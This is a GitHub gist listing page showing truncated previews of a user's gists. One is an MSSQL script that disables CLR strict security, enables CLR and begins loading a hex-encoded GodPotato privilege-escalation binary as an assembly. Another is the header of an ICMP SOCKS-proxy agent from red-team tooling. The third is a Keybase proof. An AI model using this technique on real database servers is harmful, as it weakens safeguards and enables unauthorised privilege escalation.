Skip to content

Instantly share code, notes, and snippets.

View m57's full-sized avatar

Mitch Hines m57

317 followers · 15 following
View GitHub Profile
@m57
m57 / MSSQL_CLR_Custom_Assembly_GodPotato.sql
Created June 16, 2023 16:55
GodPotato as a MSSQL Custom CLR Assembly.
USE MSDB;
exec sp_configure 'show advanced options',1;
RECONFIGURE;
EXEC sp_configure 'clr strict security', 0;
RECONFIGURE;
exec sp_configure 'clr enabled', 1;
RECONFIGURE;
CREATE ASSEMBLY my_assembly FROM 0x4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a24000000000000005045000064860200afc554b30000000000000000f00022200b02300000d400000004000000000000000000000020000000000080010000000020000000020000040000000000000004000000000000000020010000020000000000000300408500004000000000000040000000000000000010000000000000200000000000000000000010000000000000000000000000000000000000000000010078030000000000000000000000000000000000000000000000000000fcf10000380000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000004800000000000000000000002e746578740000009dd20000002000
@m57
m57 / Entry.c
Created April 6, 2023 19:35 — forked from realoriginal/Entry.c
TLDR: How a socks proxy client is written to tunnel connections from a 'teamserver' to an agent.
/*!
*
* RPROXICMP
*
* GuidePoint Security LLC
*
* Threat and Attack Simulation Team
*
!*/
@m57
m57 / Keybase.md
Created September 26, 2017 21:23
Keybase.md

Keybase proof

I hereby claim:

  • I am m57 on github.
  • I am g0dmode (https://keybase.io/g0dmode) on keybase.
  • I have a public key ASDRQFaWsRzWZLoF7P4yPTJNVsiaJIqJSVNUVtN8IxMSsAo

To claim this, I am signing this object: